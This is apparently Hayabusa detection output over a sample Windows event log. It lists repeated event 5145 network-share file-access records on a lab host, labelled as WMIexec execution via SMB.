10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 